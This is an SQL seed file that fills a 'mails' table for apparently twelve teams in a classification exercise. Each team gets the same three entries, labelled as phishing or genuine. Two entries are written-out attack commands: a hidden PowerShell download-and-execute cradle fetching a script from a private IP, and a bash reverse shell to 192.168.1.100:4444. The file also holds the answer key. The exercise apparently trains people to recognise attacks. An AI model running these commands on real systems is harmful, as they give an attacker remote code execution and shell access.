INSERT INTO mails (id, team_id, label, sender, body, correct, answered) VALUES
(4, 1, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(5, 1, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(6, 1, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(7, 2, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(8, 2, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(9, 2, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(10, 3, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(11, 3, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(12, 3, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(13, 4, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(14, 4, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(15, 4, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(16, 5, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(17, 5, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(18, 5, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(19, 6, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(20, 6, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(21, 6, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(22, 7, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(23, 7, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(24, 7, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(25, 8, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(26, 8, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(27, 8, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(28, 9, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(29, 9, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(30, 9, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(31, 10, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(32, 10, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(33, 10, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(34, 11, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(35, 11, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(36, 11, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false),
(37, 12, 'E1', '', 'cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5/payload.ps1'')" ', 'PHISHING', false),
(38, 12, 'E2', '', 'sudo apt-get update && sudo apt-get upgrade -y && echo "System successfully patched." >> /var/log/syslog', 'GENUINE', false),
(39, 12, 'E3', '', 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1', 'PHISHING', false);